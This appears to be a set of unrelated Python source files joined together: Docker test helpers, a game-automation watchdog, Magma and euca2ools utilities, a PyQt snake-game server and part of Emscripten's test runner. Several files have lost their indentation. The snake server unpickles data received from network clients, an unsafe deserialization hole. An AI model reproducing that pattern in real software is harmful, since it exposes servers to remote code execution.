extra_volumes=extra_volumes,
synchrony_constraint_threshold=synchrony_constraint_threshold,
epoch_length=epoch_length,
quarantine_length=quarantine_length
)
try:
wait_for_node_started(context, bootstrap_node)
yield bootstrap_node
finally:
bootstrap_node.cleanup()
@contextlib.contextmanager
def started_bootstrap_with_network(
context: TestingContext,
cli_flags: Optional[AbstractSet] = None,
cli_options: Optional[Dict] = None,
synchrony_constraint_threshold: float = 0.0,
epoch_length: int = 10000,
quarantine_length: int = 50000,
extra_volumes: Optional[List[str]] = None,
wait_for_approved_block: bool = False,
) -> Generator[Node, None, None]:
with docker_network(context, context.docker) as network:
with started_bootstrap(
context=context,
network=network,
cli_flags=cli_flags,
cli_options=cli_options,
synchrony_constraint_threshold=synchrony_constraint_threshold,
extra_volumes=extra_volumes,
epoch_length=epoch_length,
quarantine_length=quarantine_length
) as bootstrap:
if wait_for_approved_block:
wait_for_approved_block_received_handler_state(context, bootstrap)
yield bootstrap
ready_bootstrap_with_network = functools.partial(started_bootstrap_with_network,
wait_for_approved_block=True)
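# Illustrative sketch (not part of the original helpers): how the context
# managers above typically compose into a two-node network inside a test.
# The arguments `context` and `peer_key` are assumed to come from the
# surrounding test fixtures.
def _example_two_node_network(context: TestingContext, peer_key: PrivateKey) -> None:
    with ready_bootstrap_with_network(context=context) as bootstrap:
        with bootstrap_connected_peer(
            context=context,
            bootstrap=bootstrap,
            name='example-peer-0',
            private_key=peer_key,
        ) as peer:
            # Both nodes are up and the peer has reached the
            # approved-block-received handler state; assertions go here.
            assert peer is not None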
|
money.py
|
import os
import time
from datetime import datetime
from multiprocessing import Process, Value
import sys
from watchdog.events import FileSystemEventHandler
from watchdog.observers import Observer
from constant import MAX_TIME
# Log output
from logger import logger as logging
from util import check_game_state, start_game, initDevice
waitTime = Value('i', 0)
def startGame(waitTime1):
initDevice()
global waitTime
waitTime = waitTime1
start_game()
check_game_state(waitTime)
def updateTime(event):
if "screen.png" in event.src_path:
global lastChangeTime
lastChangeTime = datetime.now()
logging.debug('{0}:{1}'.format(event.event_type, event.src_path))
class MyHandler(FileSystemEventHandler):
def __init__(self):
FileSystemEventHandler.__init__(self)
def on_created(self, event):
updateTime(event)
lastChangeTime = datetime.now()
if __name__ == '__main__':
closeTime = -1
args = sys.argv[1:]
if len(args) > 0:
        closeTime = int(args[0])
print("父进程:{0}".format(os.getpid()))
p = Process(target=startGame, args=(waitTime,))
p.start()
print("子进程:启动成功")
event_handler = MyHandler()
observer = Observer()
observer.schedule(event_handler, path='.', recursive=False)
observer.start()
restartCount = 0
try:
while True:
if waitTime.value < 0:
p.terminate()
observer.stop()
break
            elif waitTime.value == 0 and (datetime.now() - lastChangeTime).seconds > MAX_TIME:
                p.terminate()
                restartCount += 1
                if restartCount == 5:
                    observer.stop()
                    break
                p = Process(target=startGame, args=(waitTime,))
                logging.warning('Process restarted.')
                p.start()
                lastChangeTime = datetime.now()
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
logging.error('Process end.')
if closeTime >= 0:
        # Shut down the Windows system
os.system("shutdown -s -t {0}".format(closeTime))
|
start_pipelined.py
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import subprocess
import threading
from collections import namedtuple
from concurrent.futures import Future
from enum import Enum
from magma.pipelined.app.base import MagmaController
from magma.pipelined.internal_ip_allocator import InternalIPAllocator
from magma.pipelined.tests.app.exceptions import ServiceRunningError
from ryu.base.app_manager import AppManager
from ryu.lib import hub
class TestSetup(object):
"""
The TestSetup class variables
apps: [Controller]: ryu apps to instantiate
references: [Controller]: futures to get references of
instantiated apps
config: dict: config for ryu app
mconfig: dict: mconfig for ryu app
service_manager: ServiceManager: service manager for ryu app
integ_test: bool: set true when running tests in
integ setting
"""
def __init__(
self, apps, references, config, mconfig, loop,
service_manager, integ_test=False, rpc_stubs=None,
):
self.apps = apps
self.references = references
self.config = config
self.mconfig = mconfig
self.service_manager = service_manager
self.loop = loop
self.integ_test = integ_test
if rpc_stubs is None:
rpc_stubs = {}
self.rpc_stubs = rpc_stubs
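# Illustrative sketch (not from the original file): a typical TestSetup as built
# by a unit test. `config`, `mconfig`, `loop` and `service_manager` are assumed
# to be provided by the test, and each referenced controller is paired with a
# Future that later receives the instantiated app:
#
#     setup = TestSetup(
#         apps=[PipelinedController.InOut, PipelinedController.Testing],
#         references={
#             PipelinedController.InOut: Future(),
#             PipelinedController.Testing: Future(),
#         },
#         config=config,
#         mconfig=mconfig,
#         loop=loop,
#         service_manager=service_manager,
#         integ_test=False,
#     )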
Controller = namedtuple('Controller', ['name', 'app_future'])
class PipelinedController(Enum):
InOut = Controller(
'magma.pipelined.app.inout', 'inout',
)
Arp = Controller(
'magma.pipelined.app.arp', 'arpd',
)
IPV6RouterSolicitation = Controller(
'magma.pipelined.app.ipv6_solicitation',
'ipv6_solicitation',
)
GY = Controller(
'magma.pipelined.app.gy', 'gy',
)
Enforcement = Controller(
'magma.pipelined.app.enforcement', 'enforcement',
)
Enforcement_stats = Controller(
'magma.pipelined.app.enforcement_stats', 'enforcement_stats',
)
Testing = Controller(
'magma.pipelined.app.testing', 'testing',
)
AccessControl = Controller(
'magma.pipelined.app.access_control', 'access_control',
)
UEMac = Controller(
'magma.pipelined.app.ue_mac', 'ue_mac',
)
TunnelLearnController = Controller(
'magma.pipelined.app.tunnel_learn', 'tunnel_learn',
)
VlanLearn = Controller(
'magma.pipelined.app.vlan_learn', 'vlan_learn',
)
CheckQuotaController = Controller(
'magma.pipelined.app.check_quota', 'check_quota',
)
IPFIX = Controller(
'magma.pipelined.app.ipfix', 'ipfix',
)
LIMirror = Controller(
'magma.pipelined.app.li_mirror', 'li_mirror',
)
PacketTracer = Controller(
'magma.pipelined.app.packet_tracer', 'packet_tracer',
)
StartupFlows = Controller(
'magma.pipelined.app.startup_flows', 'startup_flows',
)
DPI = Controller(
'magma.pipelined.app.dpi', 'dpi',
)
UplinkBridge = Controller(
'magma.pipelined.app.uplink_bridge', 'uplink_bridge',
)
Conntrack = Controller(
'magma.pipelined.app.conntrack', 'conntrack',
)
Classifier = Controller(
'magma.pipelined.app.classifier', 'classifier',
)
HeaderEnrichment = Controller(
'magma.pipelined.app.he', 'proxy',
)
NGServiceController = Controller(
'magma.pipelined.app.ng_services', 'ng_services',
)
def assert_pipelined_not_running():
"""
As Ryu applications shoudn't be started if the magma@pipelined service is
running we need to verify if pipelined is active. If service is running
throws a ServiceRunningError exception.
This can be done using the command:
systemctl is-active magma@pipelined
If service is pipelined, this returns an error code 3 & message "inactive"
"""
try:
output = subprocess.check_output(
["systemctl", "is-active", "magma@pipelined"],
)
except subprocess.CalledProcessError as e:
if "inactive" not in str(e.output, 'utf-8'):
raise ServiceRunningError(
"Pipelined is running, 'systemctl is-active magma@pipelined'" +
"caused an error code %d, exception - %s"
% (e.returncode, str(e.output, 'utf-8').strip()),
)
else:
raise ServiceRunningError(
"Pipelined is running, 'systemctl is-active magma@pipelined'" +
"output - %s" % str(output, 'utf-8').strip(),
)
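# For reference, a minimal sketch of the same check written with subprocess.run
# (illustrative only; the helper above keeps check_output, so its behaviour is
# unchanged). `systemctl is-active` exits 0 when the unit is active and exits 3
# printing "inactive" when it is not:
#
#     result = subprocess.run(
#         ["systemctl", "is-active", "magma@pipelined"],
#         stdout=subprocess.PIPE, stderr=subprocess.STDOUT, check=False,
#     )
#     pipelined_running = (result.returncode == 0)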
class StartThread(object):
"""
Starts ryu applications
    Uses ryu hub and ryu app_manager to launch ryu applications. Futures are
    used to get references to the instantiated apps, which allows unittests to
call methods from pipelined apps.
"""
_Event = namedtuple('_Event', ['func', 'future'])
def __init__(self, test_setup, launch_successful_future):
""" If verification fails throw an exception, don't start ryu apps """
if test_setup.integ_test is False:
hub.patch(thread=True)
assert_pipelined_not_running()
self._test_setup = test_setup
self.keep_running = True
self.done = False
self.event_queue = hub.Queue()
thread = threading.Thread(
target=self.start_ryu_apps, args=(launch_successful_future,),
)
thread.daemon = True
thread.start()
def start_ryu_apps(self, launch_successful_future):
"""
Starts up ryu applications, all the configuration is parsed from the
test_setup config provided in the unit test.
        If an app throws an exception on launch, the error is passed through
        launch_successful_future so the caller does not wait indefinitely.
"""
self.reset_static_vars()
hub.spawn(self._process_queue)
app_lists = [a.value.name for a in self._test_setup.apps]
app_futures = {
controller.value.app_future: future
for (controller, future) in self._test_setup.references.items()
}
manager = AppManager.get_instance()
manager.load_apps(app_lists)
contexts = manager.create_contexts()
contexts['sids_by_ip'] = {} # shared by both metering apps
contexts['rule_id_mapper'] = \
self._test_setup.service_manager.rule_id_mapper
contexts['internal_ip_allocator'] = \
InternalIPAllocator(self._test_setup.config)
contexts['session_rule_version_mapper'] = \
self._test_setup.service_manager.session_rule_version_mapper
contexts['interface_to_prefix_mapper'] = \
self._test_setup.service_manager.interface_to_prefix_mapper
contexts['restart_info_store'] = \
self._test_setup.service_manager.restart_info_store
contexts['app_futures'] = app_futures
contexts['config'] = self._test_setup.config
contexts['mconfig'] = self._test_setup.mconfig
contexts['loop'] = self._test_setup.loop
contexts['rpc_stubs'] = self._test_setup.rpc_stubs
contexts['service_manager'] = self._test_setup.service_manager
contexts['ebpf_manager'] = None
logging.basicConfig(
level=logging.INFO,
format='[%(asctime)s %(levelname)s %(name)s] %(message)s',
)
services = []
try:
services.extend(manager.instantiate_apps(**contexts))
except Exception as e:
launch_successful_future.set_result(
"Ryu apps launch exception: {}".format(e),
)
raise
launch_successful_future.set_result("Setup successful")
self.run(manager)
def _process_queue(self):
"""
Run a queue to process external events that need to be run in the Ryu
greenthread
"""
while self.keep_running:
try:
event = self.event_queue.get(block=False)
val = event.func()
event.future.set_result(val)
except hub.QueueEmpty:
pass
finally:
hub.sleep(0.1)
def run_in_greenthread(self, func):
"""
When not monkey patching (i.e. when running a gRPC server), you cannot
call directly into a Ryu app. To do this, there needs to be a boundary
between futures and hub.Queues. When this function is called, a lambda
is passed which is sent into a queue to be run by the Ryu greenthread.
"""
ev = self._Event(func=func, future=Future())
self.event_queue.put(ev)
return ev.future.result()
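    # Illustrative sketch (hypothetical test code): fetching state from a Ryu app
    # owned by the greenthread without monkey patching. `thread` is a StartThread
    # and `controller` is an app reference obtained from one of the futures; the
    # method name is a placeholder:
    #
    #     flows = thread.run_in_greenthread(lambda: controller.some_query())
    #
    # The lambda executes inside _process_queue() on the Ryu greenthread and its
    # return value is handed back through the Future.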
def run(self, manager):
""" Keep running until signalled from test file """
while self.keep_running:
hub.sleep(1)
manager.close()
self.done = True
def reset_static_vars(self):
""" Reset static vars for running nosetests """
AppManager._instance = AppManager()
MagmaController.TABLES = {}
|
downloadandunbundle.py
|
# Copyright 2009-2014 Eucalyptus Systems, Inc.
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import multiprocessing
import os.path
import sys
from requestbuilder import Arg
from requestbuilder.exceptions import ArgumentError
from requestbuilder.mixins import FileTransferProgressBarMixin
from euca2ools.bundle.util import open_pipe_fileobjs
from euca2ools.bundle.util import waitpid_in_thread
from euca2ools.commands.bundle.downloadbundle import DownloadBundle
from euca2ools.commands.bundle.mixins import BundleDownloadingMixin
from euca2ools.commands.bundle.unbundlestream import UnbundleStream
from euca2ools.commands.s3 import S3Request
class DownloadAndUnbundle(S3Request, FileTransferProgressBarMixin,
BundleDownloadingMixin):
DESCRIPTION = ('Download and unbundle a bundled image from the cloud\n\n '
'The key used to unbundle the image must match a '
'certificate that was used to bundle it.')
ARGS = [Arg('-d', '--destination', dest='dest', metavar='(FILE | DIR)',
default=".", help='''where to place the unbundled image
(default: current directory)'''),
Arg('-k', '--privatekey',
help='''file containing the private key to decrypt the bundle
with. This must match a certificate used when bundling the
image.''')]
# noinspection PyExceptionInherit
def configure(self):
S3Request.configure(self)
# The private key could be the user's or the cloud's. In the config
# this is a user-level option.
if not self.args.get('privatekey'):
config_privatekey = self.config.get_user_option('private-key')
if self.args.get('userregion'):
self.args['privatekey'] = config_privatekey
elif 'EC2_PRIVATE_KEY' in os.environ:
self.args['privatekey'] = os.getenv('EC2_PRIVATE_KEY')
elif config_privatekey:
self.args['privatekey'] = config_privatekey
else:
raise ArgumentError(
'missing private key; please supply one with -k')
self.args['privatekey'] = os.path.expanduser(os.path.expandvars(
self.args['privatekey']))
if not os.path.exists(self.args['privatekey']):
raise ArgumentError("private key file '{0}' does not exist"
.format(self.args['privatekey']))
if not os.path.isfile(self.args['privatekey']):
raise ArgumentError("private key file '{0}' is not a file"
.format(self.args['privatekey']))
self.log.debug('private key: %s', self.args['privatekey'])
def __open_dest(self, manifest):
if self.args['dest'] == '-':
self.args['dest'] = sys.stdout
self.args['show_progress'] = False
elif isinstance(self.args['dest'], basestring):
if os.path.isdir(self.args['dest']):
image_filename = os.path.join(self.args['dest'],
manifest.image_name)
else:
image_filename = self.args['dest']
self.args['dest'] = open(image_filename, 'w')
return image_filename
# Otherwise we assume it's a file object
def main(self):
manifest = self.fetch_manifest(
self.service, privkey_filename=self.args['privatekey'])
download_out_r, download_out_w = open_pipe_fileobjs()
try:
self.__create_download_pipeline(download_out_w)
finally:
download_out_w.close()
image_filename = self.__open_dest(manifest)
unbundlestream = UnbundleStream.from_other(
self, source=download_out_r, dest=self.args['dest'],
enc_key=manifest.enc_key, enc_iv=manifest.enc_iv,
image_size=manifest.image_size, sha1_digest=manifest.image_digest,
show_progress=self.args.get('show_progress', False))
unbundlestream.main()
return image_filename
def __create_download_pipeline(self, outfile):
downloadbundle = DownloadBundle.from_other(
self, dest=outfile, bucket=self.args['bucket'],
manifest=self.args.get('manifest'),
local_manifest=self.args.get('local_manifest'),
show_progress=False)
downloadbundle_p = multiprocessing.Process(target=downloadbundle.main)
downloadbundle_p.start()
waitpid_in_thread(downloadbundle_p.pid)
outfile.close()
def print_result(self, image_filename):
if (image_filename and
self.args['dest'].fileno() != sys.stdout.fileno()):
print 'Wrote', image_filename
|
SnakeServer.py
|
import socket
import pickle
import random
import threading
import sys
from PyQt5.QtWidgets import *
from PyQt5.QtCore import Qt
def get_ip():
try:
h_name = socket.gethostname()
IP = socket.gethostbyname(h_name)
except Exception:
IP = '127.0.0.1'
return IP
class SnakeServer:
def __init__(self):
self.running = True
def GameSession(self, Connections):
food_pos = []
data_snake_1 = []
data_snake_2 = []
no_food = True
while self.running:
data_snake_1 = Connections[0].recv(1024)
data_snake_2 = Connections[1].recv(1024)
if not data_snake_1:
break
if not data_snake_2:
break
data_snake_1 = pickle.loads(data_snake_1)
data_snake_2 = pickle.loads(data_snake_2)
if not food_pos:
no_food = True
else:
no_food = False
while not food_pos:
x = random.randint(2, 28) * 20
y = random.randint(2, 28) * 20
if not [x, y] in data_snake_1 and not [x, y] in data_snake_2:
food_pos = [x, y]
data_snake_1.append(food_pos)
data_snake_2.append(food_pos)
if data_snake_1[-2] == food_pos or data_snake_2[-2] == food_pos:
food_pos = []
data_snake_1.append([-20, -20])
data_snake_2.append([-20, -20])
if food_pos and no_food == False:
data_snake_1.append(food_pos)
data_snake_2.append(food_pos)
data_snake_1 = pickle.dumps(data_snake_1)
data_snake_2 = pickle.dumps(data_snake_2)
Connections[0].sendall(data_snake_2)
Connections[1].sendall(data_snake_1)
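    # Summary of the per-tick exchange above (descriptive comment only): each
    # client sends a pickled list of its [x, y] segments; the server appends
    # either freshly spawned food coordinates or the off-screen [-20, -20]
    # sentinel, then forwards player 1's payload to player 2 and vice versa.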
def Start(self):
self.running = True
HOST = get_ip()
PORT = 65432
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.bind((HOST, PORT))
self.s.listen(5)
conn_list = []
threads = []
print("Server is Running")
while self.running:
for i in range(2):
try:
if i:
print("Waiting for 2nd Player to connect")
conn, addr = self.s.accept()
print('Connected by', addr[0])
conn_list.append(conn)
except:
self.running = False
threads.append(threading.Thread(
target=self.GameSession, args=(conn_list,)))
threads[-1].start()
conn_list = []
def Stop(self):
self.s.close()
self.running = False
class ServerWindow(QMainWindow):
def __init__(self, *args, **kwargs):
super(ServerWindow, self).__init__(*args, **kwargs)
self.server_is_online = False
self.ss = SnakeServer()
# self.server = threading.Thread(target=self.ss.Start, args=())
self.setWindowTitle("Server")
self.setFixedWidth(300)
self.setFixedHeight(300)
self.server_status = QLabel(" Server Status: Offline", self)
self.server_status.setStyleSheet("background-color: red")
self.server_status.resize(150, 30)
self.server_status.move(0, 0)
ip_label = QLabel("Local IP:" + get_ip(),self)
ip_label.move(200,0)
start_btn = QPushButton("Start", self)
start_btn.setToolTip("Start your Server")
start_btn.resize(150, 100)
start_btn.move(0, 200)
start_btn.setStyleSheet("QPushButton"
"{"
"background-color : green;"
"}")
start_btn.clicked.connect(self.On_start)
stop_btn = QPushButton("Stop", self)
stop_btn.setToolTip("Stop your Server")
stop_btn.resize(150, 100)
stop_btn.move(150, 200)
stop_btn.setStyleSheet("QPushButton"
"{"
"background-color : red;"
"}")
stop_btn.clicked.connect(self.On_stop)
def PlayerList(self):
pass
def On_start(self):
if not self.server_is_online:
self.server_status.setStyleSheet("background-color: green")
self.server_status.setText(" Server Status: Online")
self.server = threading.Thread(target=self.ss.Start, args=())
self.server.start()
self.server_is_online = True
else:
print("Server is allready running")
def On_stop(self):
if self.server_is_online:
self.server_status.setStyleSheet("background-color: red")
self.server_status.setText(" Server Status: Offline")
print("Server is stopping...")
self.ss.Stop()
self.server.join()
print("Server Stopped")
self.server_is_online = False
else:
print("Server is allready stopped")
if __name__ == "__main__":
app = QApplication(sys.argv)
window = ServerWindow()
window.show()
app.exec_()
|
runner.py
|
#!/usr/bin/env python2
# Copyright 2010 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
"""This is the Emscripten test runner. To run some tests, specify which tests
you want, for example
python tests/runner.py asm1.test_hello_world
There are many options for which tests to run and how to run them. For details,
see
http://kripken.github.io/emscripten-site/docs/getting_started/test-suite.html
"""
# XXX Use EMTEST_ALL_ENGINES=1 in the env to test all engines!
from __future__ import print_function
from subprocess import PIPE, STDOUT
import argparse
import atexit
import contextlib
import difflib
import fnmatch
import glob
import hashlib
import json
import logging
import math
import multiprocessing
import operator
import os
import random
import re
import shlex
import shutil
import string
import subprocess
import sys
import tempfile
import time
import unittest
import urllib
import webbrowser
if sys.version_info.major == 2:
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from urllib import unquote
else:
from http.server import HTTPServer, SimpleHTTPRequestHandler
from urllib.parse import unquote
# Setup
__rootpath__ = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(__rootpath__)
import parallel_runner
from tools.shared import EM_CONFIG, TEMP_DIR, EMCC, DEBUG, PYTHON, LLVM_TARGET, ASM_JS_TARGET, EMSCRIPTEN_TEMP_DIR, WASM_TARGET, SPIDERMONKEY_ENGINE, WINDOWS, V8_ENGINE, NODE_JS, EM_BUILD_VERBOSE
from tools.shared import asstr, get_canonical_temp_dir, Building, run_process, try_delete, to_cc, asbytes, safe_copy, Settings
from tools import jsrun, shared, line_endings
def path_from_root(*pathelems):
return os.path.join(__rootpath__, *pathelems)
sys.path.append(path_from_root('third_party/websockify'))
logger = logging.getLogger(__file__)
# User can specify an environment variable EMTEST_BROWSER to force the browser
# test suite to run using another browser command line than the default system
# browser. Setting '0' as the browser disables running a browser (but we still
# see tests compile)
EMTEST_BROWSER = os.getenv('EMTEST_BROWSER')
EMTEST_DETECT_TEMPFILE_LEAKS = int(os.getenv('EMTEST_DETECT_TEMPFILE_LEAKS', '0'))
EMTEST_WASM_PTHREADS = int(os.getenv('EMTEST_WASM_PTHREADS', '1'))
# Also support the old name: EM_SAVE_DIR
EMTEST_SAVE_DIR = os.getenv('EMTEST_SAVE_DIR', os.getenv('EM_SAVE_DIR'))
# generally js engines are equivalent, testing 1 is enough. set this
# to force testing on all js engines, good to find js engine bugs
EMTEST_ALL_ENGINES = os.getenv('EMTEST_ALL_ENGINES')
EMTEST_SKIP_SLOW = os.getenv('EMTEST_SKIP_SLOW')
EMTEST_VERBOSE = int(os.getenv('EMTEST_VERBOSE', '0'))
# checks if browser testing is enabled
def has_browser():
return EMTEST_BROWSER != '0'
# Generic decorator that calls a function named 'condition' on the test class and
# skips the test if that function returns true
def skip_if(func, condition, explanation='', negate=False):
assert callable(func)
explanation_str = ' : %s' % explanation if explanation else ''
def decorated(self):
choice = self.__getattribute__(condition)()
if negate:
choice = not choice
if choice:
self.skipTest(condition + explanation_str)
func(self)
return decorated
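# Illustrative usage sketch (hypothetical test, not from this file): skip_if wraps
# a test method and looks up a predicate method on the test class by name, e.g.
#
#     def test_wasm_only_feature(self):
#       ...
#     test_wasm_only_feature = skip_if(test_wasm_only_feature, 'is_wasm',
#                                      'feature requires wasm', negate=True)
#
# With negate=True the test is skipped when the predicate returns False, which is
# how no_fastcomp below is built on top of is_wasm_backend.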
def needs_dlfcn(func):
assert callable(func)
def decorated(self):
self.check_dlfcn()
return func(self)
return decorated
def is_slow_test(func):
assert callable(func)
def decorated(self, *args, **kwargs):
if EMTEST_SKIP_SLOW:
return self.skipTest('skipping slow tests')
return func(self, *args, **kwargs)
return decorated
def no_wasm_backend(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm_backend', note)
return decorated
def no_fastcomp(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm_backend', note, negate=True)
return decorated
def no_windows(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip(note)
return lambda f: f
# used for tests that fail now and then on CI, due to timing or other
# random causes. this tries the test a few times, looking for at least
# one pass
def flaky(f):
assert callable(f)
max_tries = 3
def decorated(self):
for i in range(max_tries - 1):
try:
f(self)
return
except Exception:
print('flaky...')
continue
# run the last time normally, to get a simpler stack trace
f(self)
return decorated
@contextlib.contextmanager
def env_modify(updates):
"""A context manager that updates os.environ."""
# This could also be done with mock.patch.dict() but taking a dependency
# on the mock library is probably not worth the benefit.
old_env = os.environ.copy()
print("env_modify: " + str(updates))
  # Setting a value to None means clearing that environment variable
clears = [key for key, value in updates.items() if value is None]
updates = {key: value for key, value in updates.items() if value is not None}
os.environ.update(updates)
for key in clears:
if key in os.environ:
del os.environ[key]
try:
yield
finally:
os.environ.clear()
os.environ.update(old_env)
# Decorator version of env_modify
def with_env_modify(updates):
def decorated(f):
def modified(self):
with env_modify(updates):
return f(self)
return modified
return decorated
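# Illustrative usage (hypothetical values): both forms apply the same temporary
# change to os.environ for the duration of the wrapped code.
#
#     with env_modify({'EMCC_DEBUG': '1', 'EMCC_CORES': None}):
#       ...  # EMCC_DEBUG is set; EMCC_CORES is cleared if present
#
#     @with_env_modify({'EMCC_DEBUG': '1'})
#     def test_something(self):
#       ...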
@contextlib.contextmanager
def chdir(dir):
"""A context manager that performs actions in the given directory."""
orig_cwd = os.getcwd()
os.chdir(dir)
try:
yield
finally:
os.chdir(orig_cwd)
def limit_size(string, MAX=800 * 20):
if len(string) < MAX:
return string
return string[0:MAX // 2] + '\n[..]\n' + string[-MAX // 2:]
def create_test_file(name, contents, binary=False):
assert not os.path.isabs(name)
mode = 'wb' if binary else 'w'
with open(name, mode) as f:
f.write(contents)
# The core test modes
core_test_modes = [
'asm0',
'asm1',
'asm2',
'asm3',
'asm2g',
'asm2f',
'wasm0',
'wasm1',
'wasm2',
'wasm3',
'wasms',
'wasmz',
'asmi',
'asm2i',
]
# The default core test mode, used when none is specified
default_core_test_mode = 'wasm0'
# The non-core test modes
non_core_test_modes = [
'other',
'browser',
'sanity',
'sockets',
'interactive',
]
test_index = 0
class RunnerCore(unittest.TestCase):
emcc_args = []
# default temporary directory settings. set_temp_dir may be called later to
# override these
temp_dir = TEMP_DIR
canonical_temp_dir = get_canonical_temp_dir(TEMP_DIR)
save_dir = EMTEST_SAVE_DIR
save_JS = 0
# This avoids cluttering the test runner output, which is stderr too, with compiler warnings etc.
# Change this to None to get stderr reporting, for debugging purposes
stderr_redirect = STDOUT
env = {}
settings_mods = {}
temp_files_before_run = []
def is_emterpreter(self):
return self.get_setting('EMTERPRETIFY')
def is_wasm(self):
return self.is_wasm_backend() or self.get_setting('WASM') != 0
def is_wasm_backend(self):
return self.get_setting('WASM_BACKEND')
def check_dlfcn(self):
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1 and not self.is_wasm():
self.skipTest('no dlfcn with memory growth (without wasm)')
def uses_memory_init_file(self):
if self.get_setting('SIDE_MODULE') or self.get_setting('WASM'):
return False
elif '--memory-init-file' in self.emcc_args:
return int(self.emcc_args[self.emcc_args.index('--memory-init-file') + 1])
else:
      # without an explicit --memory-init-file flag, emcc defaults to emitting one at -O2 and above
opt_supports = any(opt in self.emcc_args for opt in ('-O2', '-O3', '-Oz'))
return opt_supports
def set_temp_dir(self, temp_dir):
self.temp_dir = temp_dir
self.canonical_temp_dir = get_canonical_temp_dir(self.temp_dir)
# Explicitly set dedicated temporary directory for parallel tests
os.environ['EMCC_TEMP_DIR'] = self.temp_dir
@classmethod
def setUpClass(cls):
super(RunnerCore, cls).setUpClass()
print('(checking sanity from test runner)') # do this after we set env stuff
shared.check_sanity(force=True)
def setUp(self):
super(RunnerCore, self).setUp()
self.settings_mods = {}
if EMTEST_DETECT_TEMPFILE_LEAKS:
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, filename)))
self.banned_js_engines = []
self.use_all_engines = EMTEST_ALL_ENGINES
if self.save_dir:
self.working_dir = os.path.join(self.temp_dir, 'emscripten_test')
if not os.path.exists(self.working_dir):
os.makedirs(self.working_dir)
else:
self.working_dir = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=self.temp_dir)
os.chdir(self.working_dir)
# Use emscripten root for node module lookup
os.environ['NODE_PATH'] = path_from_root('node_modules')
if not self.save_dir:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not self.save_dir:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.dirname(self.get_dir()))
try_delete(self.get_dir())
if EMTEST_DETECT_TEMPFILE_LEAKS and not os.environ.get('EMCC_DEBUG'):
temp_files_after_run = []
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, filename)))
# Our leak detection will pick up *any* new temp files in the temp dir. They may not be due to
# us, but e.g. the browser when running browser tests. Until we figure out a proper solution,
# ignore some temp file names that we see on our CI infrastructure.
ignorable_files = [
'/tmp/tmpaddon',
'/tmp/circleci-no-output-timeout'
]
left_over_files = list(set(temp_files_after_run) - set(self.temp_files_before_run) - set(ignorable_files))
if len(left_over_files):
print('ERROR: After running test, there are ' + str(len(left_over_files)) + ' new temporary files/directories left behind:', file=sys.stderr)
for f in left_over_files:
print('leaked file: ' + f, file=sys.stderr)
self.fail('Test leaked ' + str(len(left_over_files)) + ' temporary files!')
# Make sure we don't leave stuff around
# if not self.has_prev_ll:
# for temp_file in os.listdir(TEMP_DIR):
# assert not temp_file.endswith('.ll'), temp_file
# # TODO assert not temp_file.startswith('emscripten_'), temp_file
def get_setting(self, key):
if key in self.settings_mods:
return self.settings_mods[key]
return Settings[key]
def set_setting(self, key, value=1):
if value is None:
self.clear_setting(key)
self.settings_mods[key] = value
def clear_setting(self, key):
self.settings_mods.pop(key, None)
def serialize_settings(self):
ret = []
for key, value in self.settings_mods.items():
if value == 1:
ret += ['-s', key]
else:
ret += ['-s', '{}={}'.format(key, json.dumps(value))]
return ret
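  # For example (illustrative): settings_mods == {'ASSERTIONS': 1, 'EXPORTED_FUNCTIONS': ['_main']}
  # serializes to ['-s', 'ASSERTIONS', '-s', 'EXPORTED_FUNCTIONS=["_main"]'].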
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def get_stdout_path(self):
return os.path.join(self.get_dir(), 'stdout')
